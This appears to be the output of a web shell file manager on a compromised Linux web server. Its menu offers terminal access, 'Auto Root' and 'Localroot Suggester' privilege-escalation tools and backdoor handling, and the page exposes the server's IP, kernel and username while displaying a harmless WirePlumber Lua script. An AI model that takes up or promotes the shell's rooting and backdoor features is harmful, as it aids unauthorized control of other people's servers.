Linux evo.fastest-server.com 5.14.0-284.1101.el9.tuxcare.11.els11.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Aug 14 13:30:35 UTC 2026 x86_64
LiteSpeed
Server IP : 103.249.112.113 & Your IP : 216.73.217.135
Domains : 988 Domain
User : tanishks
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
wireplumber /
scripts /
Delete
Unzip
Name
Size
Permission
Date
Action
client
[ DIR ]
drwxr-xr-x
2026-09-04 10:13
default-nodes
[ DIR ]
drwxr-xr-x
2026-09-04 10:13
device
[ DIR ]
drwxr-xr-x
2026-09-04 10:13
lib
[ DIR ]
drwxr-xr-x
2026-09-04 10:13
linking
[ DIR ]
drwxr-xr-x
2026-09-04 10:13
monitors
[ DIR ]
drwxr-xr-x
2026-09-04 10:13
node
[ DIR ]
drwxr-xr-x
2026-09-04 10:13
fallback-sink.lua
2.32
KB
-rw-r--r--
2025-10-10 14:43
metadata.lua
662
B
-rw-r--r--
2025-10-10 14:43
session-services.lua
1.14
KB
-rw-r--r--
2025-10-10 14:43
sm-objects.lua
3.34
KB
-rw-r--r--
2025-10-10 14:43
Save
Rename
-- WirePlumber -- -- Copyright © 2024 Collabora Ltd. -- -- SPDX-License-Identifier: MIT local features_to_services = { ["monitor.alsa"] = { "audio", "api.alsa" }, ["monitor.alsa-midi"] = { "midi", "api.alsa-seq" }, ["monitor.bluez"] = { "bluetooth.audio", "api.bluez" }, ["monitor.bluez-midi"] = { "bluetooth.midi", "api.bluez" }, ["monitor.v4l2"] = { "video-capture", "api.v4l2" }, ["monitor.libcamera"] = { "video-capture", "api.libcamera" }, ["policy.device.profile"] = { "policy.device.profile" }, ["policy.device.routes"] = { "policy.device.routes" }, ["policy.default-nodes"] = { "policy.default-nodes" }, ["policy.linking.standard"] = { "policy.linking.standard" }, ["policy.linking.role-based"] = { "policy.linking.role-based" }, } local services = {} for k, v in pairs (features_to_services) do if Core.test_feature (k) then for _, s in pairs (v) do services[s] = s end end end -- convert to array with numeric indices local services_array = {} for _, s in pairs (services) do table.insert (services_array, s) end Core.update_properties { ["session.services"] = "[" .. table.concat (services_array, ", ") .. "]" }